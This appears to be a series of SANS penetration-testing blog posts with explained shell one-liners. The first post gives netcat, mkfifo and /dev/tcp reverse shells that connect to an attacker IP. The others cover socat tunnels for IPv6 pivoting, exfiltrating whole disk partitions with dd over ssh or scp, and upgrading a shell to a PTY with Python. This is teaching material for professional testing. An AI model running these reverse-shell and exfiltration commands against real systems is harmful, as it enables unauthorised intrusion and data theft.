Sifting through client external and internal websites is a vital step in any pentest. A tester can uncover all sorts of juicy information such as the identities of important individuals, email addresses, corporate jargon, trusted relationships, and more just hanging out there in the open. But sometimes you really hit the jackpot, command injection! While this isn’t meant to be a blog post on web app pentesting, modern websites provide prolific exploitation opportunities to network penetration testers, starting at shell. Whether you’ve attained remote code execution through a web flaw, remote file inclusion, or admin access to popular content management systems like WordPress, converting your toehold into an interactive session on the target is a solid next step.

 

BuiltInNetcatClient_01

Methods Covered in this Section

  • nc -e reverse shell:
nc -e /bin/sh 10.0.0.189 1234
  • nc reverse shell without -e:
rm /tmp/pipe; mkfifo /tmp/pipe; cat /tmp/pipe|/bin/sh -i 2>&1|nc 10.0.0.189 1234 > /tmp/pipe
  • /dev/tcp reverse shell:
bash -i >& /dev/tcp/10.0.0.189/80 0>&1

 

We all know and love Netcat right? It’s the “TCP/IP Swiss Army Knife!” A simple little nc one liner can turn command execution into shell access:

nc -e /bin/sh 10.0.0.189 1234

 

Many modern versions of nc ship without the -e option due to the obvious security implications demonstrated above, but even without the -e option, we can achieve shell through pipes and output redirection as seen below:

rm /tmp/pipe; mkfifo /tmp/pipe; cat /tmp/pipe|/bin/sh -i 2>&1|nc 10.0.0.189 1234 > /tmp/pipe

 

Both of those commands have one big limitation: they require nc to be present on the system. Unfortunately, this isn’t always the case. For those times when nc isn’t available, the same functionality can be found using nothing more than bash.

 

/dev/tcp

 

For this trick to work the target system’s bash must have been compiled with the --enable-net-redirections flag. The magic of this flag is that it causes accesses on the /dev/tcp/ip_address/port device file to read and write from a TCP socket that is dynamically created based on the IP Address (or hostname) and port specified in the file path. The additional magic is found in the ubiquity of bash and that most major Linux distributions ship with this option included.

In order to turn this into an interactive session, we need to connect /dev/tcp to a nc listener running on our attack station and tie read and write operations from the /dev/tcp device file to the input and output of a bash process.

/dev/tcp reverse shell:
bash -i >& /dev/tcp/10.0.0.189/80 0>&1

BuiltInNetcatClient_02

Note that the result of the whoami has changed from our listener to the user that instantiated the bash reverse shell… root

 

Command Breakdown

  • On attack station:

nc -vlp 9000

1. nc - Command line tool for making TCP sockets
2. -v - Execute in verbose mode
3. -l - Listen, open a TCP socket on the local machine
4. -p 9000 - Port to listen on

 

  • On target:

bash -i >& /dev/tcp/10.0.0.189/9000 0>&1

1. bash - Bourne-Again SHell command language interpreter
2. -i - Interactive mode
3. >& - Direct bash stdout into the /dev/tcp file descriptor
4. /dev/tcp/10.0.0.189/9000 - Connects to port 9000 on 10.0.0.189
5. 0>&1 - Redirects stdin from the connection back into bash

 

So what exactly is the above doing? First, we run an interactive bash session and direct both standard out and standard error to the /dev/tcp file descriptor that represents the connection to our nc listener. Then we specify to read standard input from the connection back to the bash shell that has been spawned. Since we invoked an interactive session, our nc listener should stay connected to this bash process until we exit out of the session.

 

As was previously mentioned, bash support of /dev/tcp isn’t guaranteed. Recent Ubuntu and Redhat releases as well as OSX/MacOS support it while Debian traditionally does not. A quick check to test for support is to run the following:

: < /dev/tcp/www.google.com/80 && echo Supported || echo Unsupported

 

If you’ve got a unique use for /dev/tcp bash support, please include it in the comments below!

Matthew Toussain

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

 

Pen Test Poster: “White Board” – Bash – Useful IPv6 Pivot

 

Board Elements_clean_Useful IPv6 Pivot

By Matthew Toussain, Grant Curell

 

Introduction

As a guy coming from network engineering, it is really exciting to see IPv6 adoption finally starting to pick up. According to Akamai, Belgium is leading the charge at a whopping 50.3% adoption rate, but the US is picking up steam at a respectable 24.3% at the end of 2016. This means the pentesting community will be seeing it more in our day to day work, which will come as something of a surprise to many.

IPv6 brings a lot of changes, many of which are relevant from a security perspective. It also brings with it unique potential for added vulnerable space that can be leveraged in network compromises. IPv6 is not well understood and prone to misconfiguration. During security assessments, I’ve seen these settings result in critical security vulnerabilities including a firewall configured to provide carte blanche access to the entire network for all traffic using IPv6. Operating in IPv6 and taking advantage of these weaknesses is a key opportunity for pentesters.

 

Methods Covered in this Section

  • socat IPv4IPv6 Tunnel:
socat TCP4-LISTEN:80,fork,su=nobody TCP6:[2000::1:215:5dff:fe01:247]:80
  • socat Local Link IPv4IPv6 Tunnel:
socat TCP4-LISTEN:445,fork,su=nobody TCP6:[fe80::2d24:c19c:892:4d3%eth0]:445

 

useful_ipv6_01

Background

There are a couple of things to understand before hopping into an IPv6-centric pentest. Most in the field are familiar with the big difference: a larger address space. The addresses are 128 bits instead of the traditional 32. If you are in a pentesting engagement, most of the targets you will encounter are broken into /64 subnets. ARIN, the agency responsible for IP address assignment in North America, is handing out the addresses in pretty generous chunks for now. This is probably a safe practice considering there are 3.402×10^38 possible addresses available.

Fun fact: there are roughly 7×10^27 atoms in the average 155 pound person. This means there are enough IPv6 addresses to assign an address to each atom of every person on the entire planet and have plenty of addresses left over.

One of the most notable differences in IPv6 is that interfaces can and frequently have multiple IP addresses. Each interface will *typically* have both a link local IP address and a global IP address.

eth0      Link encap:Ethernet HWaddr 00:15:5d:01:02:29
          inet6 addr: 2000::1:215:5dff:fe01:229/64 Scope:Global
          inet6 addr: fe80::215:5dff:fe01:229/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
          RX packets:118 errors:0 dropped:0 overruns:0 frame:0
          TX packets:72 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:18041 (18.0 KB) TX bytes:17748 (17.7 KB)

 

Above is a very common IPv6 configuration. Any global address will begin with 2000::/3 and a link local address will begin with FE80::/10. On Linux distributions, this is annotated by Scope:Global or Scope:Link next to the address in the ifconfig command output. In IPv6, global IP addresses can be thought of in a similar fashion as public IP addresses in IPv4. However, unlike the IPv4 169.254.0.0/16 link local address space, almost all IPv6 interfaces will have an autoconfigured link local address typically generated from the interface’s MAC address.

 

Pivoting with IPv6

Now that we have some background, we can examine pivoting techniques. Many tools natively support IPv6, but some do not. Consider, the web server vulnerability scanner Nikto:

useful_ipv6_02a

 

Hmmm, not the results we were looking for. The problem is that Nikto doesn’t understand IPv6! To get around this limitation we can use a technique called tunneling. The concept behind tunneling is encapsulation. In the case of Nikto, we need to encapsulate it’s IPv4 content within an IPv6 stream. This condition often proves true in environments as well. Often IPv6 isn’t ubiquitous throughout the network. In the network engineering community network pockets that support IPv6 are called IPv6 “islands.” One way we link them together is by tunneling IPv6 over IPv4. IPv6 goes in, becomes IPv4, it traverses the IPv4 backbone, and comes out the other side IPv6. What this means to us as pentesters is that IPv6, in addition to having unique vulnerabilities, can frequently be a means to navigate from one part of a network to another. In some cases, an IPv6 target can take us behind the firewall and into the heart of the network. To get Nikto working against an IPv6 target we need to replicate this IPv4IPv6 condition on our local system.

To accomplish this we will use a tool called SOcket CAT or socat. SOCAT is a multipurpose relay tool with IPv6 compatibility that is syntactically similar to the traditional Netcat. socat comes with enhanced functionality built in that we can leverage to form bidirectional byte streams in order to tunnel our tools over IPv6. This works by opening a TCP socket listening on an IPv4 address and then forwarding all traffic received to a TCP socket listening on an IPv6 address. Let’s instantiate a socat IPv4IPv6 tunnel, and verify that it is running:

socat IPv4IPv6 tunnel:
socat TCP4-LISTEN:80,fork,su=nobody TCP6:[2000::1:215:5dff:fe01:247]:80

useful_ipv6_02

Command Breakdown

socat TCP4-LISTEN:80,fork,su=nobody TCP6:[2000::1:215:5dff:fe01:247]:80

  1. 1. socat - Command line tool that establishes bidirectional byte streams
    2. TCP4-LISTEN:80 - Specifies TCP port to receive incoming data
    3. fork - Forks a child process for each established connection
    4. su=nobody - Runs each forked process as an unprivileged user
    5. TCP6:[2000::..:247] - Remote destination to connect to
    6. :80 - Remote port to connect to

 

This creates an IPv4 socket on port 80 listening on all interfaces. SOCAT will forward any traffic received on port 80 by the local system to port 80 on the remote system at 2000::1:215:5dff:fe01:247.

useful_ipv6_03

 

Using nc to make a GET request we see the same result returned for the remote IPv6 web server. The first command points to the localhost SOCAT redirector which forwards the traffic over IPv6. The second is a direct netcat connection over IPv6 to 2000::1:215:5dff:fe01:247. Now let’s give Nikto a try:

useful_ipv6_04

 

Now that the tunnel is running. We can examine the traffic to see what is happening in the background. This is the traffic coming out of the pentester’s system on eth0 during the Nikto scan. You can see the traffic traversing over IPv6 as expected:

useful_ipv6_05

You can use SOCAT in much the same manner you would use SSH tunneling. Below is a screenshot of a browser accessing localhost over port 80. Here, SOCAT forwards the traffic to a remote IPv6 address for us enabling access to the metasploitable2 home page. SOCAT also natively supports socks proxying by way of the SOCKS4A option. SOCAT redirectors can be chained together to further enable network mobility or even covert operations.

useful_ipv6_06

 

Gotcha

There is one “gotcha” with this technique. When you are communicating over the link local interface you must tell the machine which interface you are using. This changes our SOCAT syntax to look something like this:

socat local link tunnel:
socat TCP4-LISTEN:445,fork TCP6:[fe80::2d24:c19c:892:4d3%wlp1s0]:445

useful_ipv6_07

 

Notice that the desired link local interface must be added to the target address in the command above (wlp1s0 in this case). Link local addresses only work within the layer 2 domain of the interface. In IPv4 terms this behavior is similar to ARP broadcast domains. If an ARP broadcast would touch the interface, you will be able to use an interface’s link local address.

This is a handy technique to keep in mind while pentesting because almost all operating systems enable IPv6 by default. A network may have limited layer 3 IPv4 connectivity due to segmentation and filtering, but you just might be able to connect to an IPv6 link local address.

Hopefully IPv6 and the options available make a bit more sense now! The next chance you get, I heartily recommend taking a look around for the presence of IPv6. Network engineers are still coming to terms with the security implications to their networks. For pentesters this opens a world of vulnerability possibilities and you never know what you might find… until you do.

Matthew Toussain
https://twitter.com/0sm0s1z

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Pen Test Poster: “White Board” – Bash – Encrypted Exfil Channel!

Board Elements_clean_Encrypted Exfil Channel!

By Matthew Toussain, Geoff Pamerleau

 

Introduction

Sometimes, when looking through files for useful information after exploiting a box, you might run into a small file system or particularly interesting disk partition. Due to time constraints and the need for specialized analysis tools it might be helpful or even necessary to exfiltrate the entire partition. In these cases, we can combine the powers of dd as a data duplication tool and ssh as a means of securely and reliably transferring data to efficiently bring the remote partition to our local attack machine.

 

Methods Covered in this Section

  • scp Recursive File Transfer via Secure Shell:
scp -C -r /data/ root@10.0.0.5:/root/Desktop/data
  • dd + ssh Compressed Data Exfil over Encrypted Channel:
dd if=/dev/sdb1 bs=65536 conv=noerror,sync | ssh -C root@10.0.0.5 "cat > /root/Desktop/data.dd"

 

Take for example the output of this df command:

encrypted_exfil_01

 

Assuming that the device mounted to /data has interesting information and we want to take it all for further analysis we could try to recursively copy it over with scp:

scp Recursive File Transfer via Secure Shell:
scp -C -r /data/ adhd@10.0.0.210:/home/adhd/Desktop/data

encrypted_exfil_02

 

Command Breakdown

scp -C -r /data/ adhd@10.0.0.210:/home/adhd/Desktop/data

  1. 1. scp - Command line tool for file transfer via secure shell
    2. -C - Enable compression flag within ssh
    3. -r - Recurse directory copying all files, directories, and links
    4. /data/ - Local directory to be transferred
    5. adhd@10.0.0.210: - Destination user@IP
    6. /home/adhd/Desktop/data - Destination folder to copy files into

 

This provides a file-by-file copy mechanism that will bring copies of all files in the /data directory back to the pentester’s system. Measuring performance in terms of time, bandwidth used, and data pulled across multiple executions provided the following metrics:

Execution time: 23.643s — Data brought to attack system: 684,756,992 bytes — Bytes on wire: 719,593,027

encrypted_exfil_03

Doing a quick comparison we can see that the compression of scp on our test dataset ( ~685MB random data split into 653 files) was completely ineffective. In fact, the compression actually bloated the amount of data transmitted on the wire; data sent was approximately 105% the size of the data on disk.

Maybe dd + ssh will provide a superior alternative?

By using the dd command we can perform a byte-by-byte copy of the underlying partition that is mounted to the /data directory. Copying data this way will bring back the entire partition, slack space included, so that disk forensics tools can even be used to recover data that has been deleted from the victim machine.

dd + ssh Compressed Data Exfil over Encrypted Channel:
dd if=/dev/sdb1 bs=65536 conv=noerror,sync | ssh -C adhd@10.0.0.210 "cat > /home/adhd/Desktop/data.dd"

encrypted_exfil_04

 

Command Breakdown Cont.

dd if=/dev/sdb1 bs=65536 conv=noerror,sync | ssh -C adhd@10.0.0.210 "cat > /home/adhd/Desktop/data.dd"

  1. 1. dd - Command line tool to copy files byte-by-byte
    2. if=/dev/sdb1 - In File, specifies the file to be copied
    3. bs=65536 - Buffer of bytes to read/write concurrently
    4. conv=noerror,sync - Convert file,continue after read errors, include metadata
    5. | - Pushes dd output into ssh command
    6. ssh - Command line tool to connect to remote systems via Secure Shell
    7. -C - Enable compression flag within ssh
    8. adhd@10.0.0.210 - Destination user@IP
    9. "cat > /home/adhd/Desktop/data.dd" - Destination image to copied into

 

In the above dd command we use the In File switch (if=) to specify the input file for duplication (in this case /dev/sdb1, the underlying partition which is mounted on /data). The byte size (bs=) argument is used to specify the byte size; the number of bytes to be read concurrently. Because the output of this dd command is being directed (via | operator) into the ssh command to stream data to the attack station we specified 65536 bytes, this is generally the maximum capacity of the pipe buffer (PIPE_BUF) on Unix systems though this can vary wildly. The convert (conv=) arguments of noerror and sync are commonly used when making backup images. They allow dd to continue image creation when read errors occur and to replace missing data in the created image with null bytes to preserve as much of the original image as possible. For performance statistics the above command was run multiple times and yielded the following metrics:

Execution time:23.726s – Data brought to attack system: 1,072,693,248 bytes – Bytes on wire: 723,521,089

So with dd + ssh running on the same dataset of completely random data, compression functioned as intended and data transmitted was approximately 67% the size of the data on disk. Additionally, the execution time was only .083 seconds slower despite the 56.6% larger byte-by-byte disk image that was transferred.

 

Conclusion

In additional testing the dd + ssh option continued to performed. Even against standalone files dd + ssh performance was nearly identical to or outperformed the scp alternative. While this won’t hold true in every scenario, and while there are definitely some cases where scp would be the better option, dd + ssh provides a robust solution to enable controlled, compressed, and encrypted mass data transfer.

 

Matthew Toussain
https://twitter.com/0sm0s1z

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Pen Test Poster: “White Board”- Python – Raw Shell Terminal

Board Elements_clean_Raw Shell -- Terminal

A long time ago, on networks in your community, we had “computer terminals” on our desks that talked to our computers.   They may have looked like monitors with keyboard attached to them, but there was more to them than that.  They had input buffers that processed what was typed on them.  Function keys like the print screen key button and control key sequences could be processed locally in the terminal before sending anything to the computers.   The computer could send the terminal special “Escape codes” like “ESC [ 1 2 h” (http://vt100.net/docs/vt102-ug/chapter5.html#S5.5.2.13) to tell the terminal not to display the keys being pressed so passwords were not displayed on the terminal.  Today, the terminals are gone and the functions that they provided are now performed by the “TTY” and “PTY” on your Linux/Unix systems.

Today programs can use the OS’s TTY/PTY to perform line editing (backspace, up arrow, down arrow, etc) and session management (Control C to kill a program, Control Z background etc) .   Programs, such as Python’s readline module, can put the TTY’s line discipline in “raw” mode and perform those TTY functions themselves.   Programs that use raw mode like this will probably perform just fine when you connect to them over a raw socket or netcat.    But other programs such as BASH that expect to communicate with a TTY can have some undesirable results when run through a raw network connection or netcat where no TTY is present.

You have probably experience this before.   You hit CONTROL-C in a netcat windows intending to kill a remote process and instead it kills your netcat session.    You run a command such "su -" and when the OS sends the echo off escape code I mentioned , your netcat session breaks.   Fear not!  If you have a remote Linux OS then this simple Python script will launch bash inside of a PTY and make most of these problems go away.

python -c 'import pty; pty.spawn("/bin/bash")'

 

You can run this command with out any problems inside of an existing bash program that is NOT in a TTY and it will launch as second process that is in a TTY.   Unfortunately, this scripts will only work on your Linux targets.   Windows doesn’t nativley support PTYs so the target must be a Linux computer.  For a seamless experience both the attack box and the target should be a Linux box.   If both sides of the connection have a TTY (ie running Linux) you can hit CONTROL-C to kill a remote program without losing your connection.  To kill your connection you have to type "exit".   That returns you back to your ‘non-TTY’ shell where pressing CONTROL-C will kill the connection.

In a pinch you could use Windows as the attack box.  Although it isn’t a completely seamless experience, this wonderful little Python command still fixes issues with commands like "sudo" and "su".  The command "top" even works pretty well although you have to press "q" and "enter" to exit rather than just pressing "q" to quit.   Pressing "enter" to transmit data is required for many things if the attack box is Windows.   Some commands such as "vi" still don’t work.  Unfortunately, pressing CONTROL-C will still kill your Windows netcat client.   Even worse, when CONTROL-C kills your netcat client it will leave the remote shell running in an remotely unrecoverable state.   Just as we discussed for Linux you must type 'exit' to leave your shell and return to the ‘non-TTY’ shell and then hit CONTROL-C to properly exit the shell.

All hope is not lost if either the Attack or Target system is Windows.  There are some simple work around for most basic operations that are covered extensively in SANS SEC560: Network Penetration Testing and Ethical Hacking.   If you would like more information about this and other Python modules please check out SEC573: Automating Information Security with Python.

 

Mark Baggett

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02